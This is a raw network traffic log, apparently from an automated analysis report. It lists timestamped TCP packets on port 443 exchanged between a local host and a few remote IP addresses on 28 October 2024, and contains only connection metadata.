                                                                            Oct 28, 2024 09:37:07.822166920 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.822262049 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.822312117 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.822324038 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.822443008 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.822489023 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.822499037 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.823077917 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.823136091 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.823147058 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.830893040 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.830928087 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.877301931 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.877302885 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.877322912 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.882340908 CET4434983413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.882661104 CET49834443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.882685900 CET4434983413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.883035898 CET49834443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.883043051 CET4434983413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.893588066 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.893704891 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.893754005 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.893769979 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.893786907 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.893850088 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.893863916 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.894845963 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.894907951 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.894957066 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.894970894 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.895039082 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.895082951 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.903398037 CET4434983713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.903543949 CET4434983713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.903577089 CET4434983613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.903621912 CET49837443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.903712034 CET4434983613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.903713942 CET49837443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.903713942 CET49837443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.903747082 CET4434983713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.903769970 CET4434983713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.903772116 CET49836443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.903883934 CET49836443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.903883934 CET49836443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.903915882 CET4434983613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.903942108 CET4434983613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.906297922 CET49839443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.906353951 CET4434983913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.906388998 CET49840443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.906426907 CET49839443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.906470060 CET4434984013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.906544924 CET49840443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.906637907 CET49839443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.906666040 CET4434983913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.906697035 CET49840443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.906734943 CET4434984013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.921499968 CET4434983813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.921648979 CET4434983813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.921717882 CET49838443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.921757936 CET49838443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.921757936 CET49838443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.921773911 CET4434983813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.921792984 CET4434983813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.923682928 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.923985958 CET49841443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.924046040 CET4434984113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.924125910 CET49841443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.924349070 CET49841443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.924376011 CET4434984113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.939333916 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.943514109 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.943700075 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.943774939 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.943788052 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.943815947 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.943871975 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.943928003 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.944252014 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.944335938 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.944395065 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.944412947 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.945298910 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.945367098 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.945379972 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:07.946316957 CET4434983513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.946394920 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:07.946502924 CET4434983513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.947367907 CET49835443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.953360081 CET49835443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.953387976 CET4434983513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.953437090 CET49835443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.953453064 CET4434983513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.956598043 CET49842443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.956638098 CET4434984213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:07.956763029 CET49842443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.956882954 CET49842443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:07.956899881 CET4434984213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.010668993 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.010761023 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.010806084 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.010858059 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.010880947 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.010946035 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.011759996 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.011827946 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.011913061 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.011961937 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.011979103 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.012033939 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.013559103 CET4434983413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.013700962 CET4434983413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.013765097 CET49834443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.013828993 CET49834443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.013856888 CET4434983413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.013889074 CET49834443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.013904095 CET4434983413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.016006947 CET49843443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.016036034 CET4434984313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.016114950 CET49843443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.016299963 CET49843443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.016324997 CET4434984313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.056056023 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.065115929 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.065140963 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.065196037 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.065268993 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.065356016 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.065387011 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.065656900 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.065685034 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.066356897 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.066418886 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.066431046 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.066536903 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.066694021 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.066771030 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.108417034 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.127351999 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.127362967 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.127425909 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.128550053 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.128587961 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.128611088 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.128676891 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.128716946 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.170692921 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.172421932 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.172431946 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.172493935 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.187273979 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.187341928 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.187474012 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.187546968 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.188230038 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.188287020 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.212946892 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.232335091 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.232408047 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.244285107 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.244321108 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.244368076 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.245367050 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.245452881 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.245484114 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.245547056 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.289271116 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.289282084 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.289352894 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.309004068 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.309077024 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.309137106 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.309319019 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.309381962 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.309448004 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.309587002 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.309663057 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.354206085 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.354280949 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.361257076 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.361267090 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.361351013 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.362025023 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.362031937 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.362102985 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.406132936 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.406141043 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.406214952 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.406671047 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.406750917 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.430958033 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.431024075 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.431052923 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.431087017 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.431118011 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.431123972 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.431164026 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.595954895 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.596149921 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.596189976 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.596259117 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.596302032 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.596324921 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.596493006 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.596565962 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.596653938 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.596716881 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.597543955 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.597609043 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.649446011 CET4434983913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.669809103 CET4434984013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.672066927 CET4434984113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.694685936 CET4434984213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.695852995 CET49839443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.712819099 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.712909937 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.712966919 CET49840443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.727850914 CET49841443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.743849993 CET49842443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.749816895 CET4434984313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.757662058 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.757761002 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.757855892 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.757920980 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.801835060 CET49843443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.809457064 CET49843443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.809504032 CET4434984313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.809910059 CET49843443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.809923887 CET4434984313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.810369015 CET49842443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.810417891 CET4434984213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.812442064 CET49842443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.812460899 CET4434984213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.813198090 CET49839443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.813250065 CET4434983913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.814438105 CET49839443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.814488888 CET4434983913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.819552898 CET49840443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.819603920 CET4434984013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.820754051 CET49840443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.820769072 CET4434984013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.826062918 CET49841443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.826076031 CET4434984113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.827364922 CET49841443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.827375889 CET4434984113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.828484058 CET49831443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.828528881 CET44349831104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.829567909 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.829659939 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.874383926 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.874448061 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.874695063 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.874752045 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.938510895 CET4434984213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.938673973 CET4434984213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.938735962 CET49842443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.943706036 CET4434983913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.943847895 CET4434983913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.943921089 CET49839443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.946616888 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.946698904 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.950525999 CET49842443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.950525999 CET49842443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.950558901 CET4434984213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.950584888 CET4434984213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.950887918 CET4434984013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.951127052 CET4434984013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.951184988 CET49840443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.953716040 CET49840443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.953728914 CET4434984013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.954056978 CET4434984313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.954138041 CET4434984113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.954210043 CET4434984313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.954271078 CET49843443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.954333067 CET4434984113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.954380035 CET49841443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.954745054 CET49843443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.954787016 CET4434984313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.954814911 CET49843443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.954845905 CET4434984313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.959023952 CET49841443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.959037066 CET4434984113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.959063053 CET49841443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.959073067 CET4434984113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.961237907 CET49839443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.961283922 CET4434983913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.961313963 CET49839443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.961329937 CET4434983913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.977572918 CET49846443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.977621078 CET4434984613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.977688074 CET49846443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.978277922 CET49847443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.978341103 CET4434984713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.978406906 CET49847443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.983936071 CET49848443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.983994007 CET4434984813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.984064102 CET49848443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.984181881 CET49846443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.984214067 CET4434984613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.984747887 CET49847443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.984782934 CET4434984713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.986515999 CET49849443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.986560106 CET4434984913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.986618996 CET49849443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.986952066 CET49849443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.986973047 CET4434984913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.987195015 CET49848443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.987231970 CET4434984813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.990958929 CET49850443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.990987062 CET4434985013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.991063118 CET49850443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.991281986 CET49850443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:08.991298914 CET4434985013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:08.991763115 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.991827965 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.991905928 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.991962910 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.991977930 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.992005110 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:08.992059946 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.992857933 CET49832443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:37:08.992876053 CET44349832104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:37:09.094949961 CET49851443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:09.094984055 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:09.095057011 CET49851443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:09.105891943 CET49851443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:09.105920076 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:09.701885939 CET44349851104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:37:09.710762978 CET4434984713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.724318981 CET4434984613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.727943897 CET4434984813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.751108885 CET4434984913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.751123905 CET4434985013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:09.752618074 CET49851443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:37:09.752651930 CET49847443192.168.2.413.107.246.45
